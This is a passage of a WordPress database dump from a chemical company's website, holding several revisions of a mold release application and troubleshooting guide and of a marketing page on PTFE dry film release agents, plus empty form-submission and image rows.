depleting chemicals). NSN 6850-01-346-9144 (14 oz)', 'inherit', 'closed', 'closed', '', '489-autosave-v1', '', '', '2016-11-12 14:14:51', '2016-11-12 14:14:51', '', 489, 'https://www.miller-stephenson.com/489-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3011, 3, '2016-11-13 20:19:29', '2016-11-13 20:19:29', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-13 20:19:29', '2016-11-13 20:19:29', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3012, 0, '2016-11-14 07:30:55', '2016-11-14 07:30:55', '', '', '', 'publish', 'closed', 'closed', '', '3012', '', '', '2016-11-14 07:30:55', '2016-11-14 07:30:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3012/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3013, 0, '2016-11-14 08:05:16', '2016-11-14 08:05:16', '', '', '', 'publish', 'closed', 'closed', '', '3013', '', '', '2016-11-14 08:05:16', '2016-11-14 08:05:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3013/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3014, 0, '2016-11-14 16:14:42', '2016-11-14 16:14:42', '', '', '', 'publish', 'closed', 'closed', '', '3014', '', '', '2016-11-14 16:14:42', '2016-11-14 16:14:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3014/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3015, 3, '2016-11-14 18:51:07', '2016-11-14 18:51:07', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n<p style="text-align: center;">[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]</p>', 'PTFE Dry Film Mold Release Agents', '', 'publish', 'closed', 'closed', '', 'ptfe-dry-film-mold-release-agents', '', '', '2016-12-22 16:50:00', '2016-12-22 16:50:00', '', 0, 'https://www.miller-stephenson.com/?p=3015', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3016, 3, '2016-11-14 17:10:30', '2016-11-14 17:10:30', '<h1></h1>', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-14 17:10:30', '2016-11-14 17:10:30', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3017, 3, '2016-11-14 17:21:32', '2016-11-14 17:21:32', '<h1> Optimized surface adhesion; No Post-Molding cleaning</h1>', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-14 17:21:32', '2016-11-14 17:21:32', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3018, 3, '2016-11-14 18:25:48', '2016-11-14 18:25:48', '', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_401774137', '', '', '2016-11-24 03:29:37', '2016-11-24 03:29:37', '', 3015, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_401774137.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3019, 0, '2016-11-14 18:45:23', '2016-11-14 18:45:23', '', '', '', 'publish', 'closed', 'closed', '', '3019', '', '', '2016-11-14 18:45:24', '2016-11-14 18:45:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3019/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3020, 3, '2016-11-14 18:51:07', '2016-11-14 18:51:07', '<h1>PTFE Dry Film Mold Release Agents: Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\n<span style="font-size: 14.4px;">In comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary </span>processes<span style="font-size: 14.4px;"> such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.</span>Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  <span style="font-size: 14.4px;">PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be <em>ineffective with injection molding operations.</em>  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s </span><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.</span>\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-14 18:51:07', '2016-11-14 18:51:07', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3022, 165, '2016-11-14 21:34:18', '2016-11-14 21:34:18', '', '', '', 'publish', 'closed', 'closed', '', '3022', '', '', '2016-11-14 21:34:18', '2016-11-14 21:34:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3022/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3023, 0, '2016-11-15 01:47:03', '2016-11-15 01:47:03', '', '', '', 'publish', 'closed', 'closed', '', '3023', '', '', '2016-11-15 01:47:03', '2016-11-15 01:47:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3023/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3024, 0, '2016-11-15 06:12:59', '2016-11-15 06:12:59', '', '', '', 'publish', 'closed', 'closed', '', '3024', '', '', '2016-11-15 06:12:59', '2016-11-15 06:12:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3024/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3025, 0, '2016-11-15 13:33:50', '2016-11-15 13:33:50', '', '', '', 'publish', 'closed', 'closed', '', '3025', '', '', '2016-11-15 13:33:50', '2016-11-15 13:33:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3025/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3026, 166, '2016-11-15 16:21:19', '2016-11-15 16:21:19', '', '', '', 'publish', 'closed', 'closed', '', '3026', '', '', '2016-11-15 16:21:20', '2016-11-15 16:21:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3026/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3027, 3, '2016-11-15 16:48:36', '2016-11-15 16:48:36', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\n<span style="font-size: 14.4px;">In comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary </span>processes<span style="font-size: 14.4px;"> such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.</span>Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  <span style="font-size: 14.4px;">PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be <em>ineffective with injection molding operations.</em>  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s </span><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span>To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:48:36', '2016-11-15 16:48:36', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3028, 3, '2016-11-15 16:49:26', '2016-11-15 16:49:26', 'PTFE DryFilm Release Agent', 'PTFE DryFilm Release Agent', 'PTFE DryFilm Release Agent', 'inherit', 'closed', 'closed', '', 'shutterstock_360561536', '', '', '2016-11-15 16:49:49', '2016-11-15 16:49:49', '', 3015, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3029, 3, '2016-11-15 16:51:19', '2016-11-15 16:51:19', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\n<span style="font-size: 14.4px;">In comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary </span>processes<span style="font-size: 14.4px;"> such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that 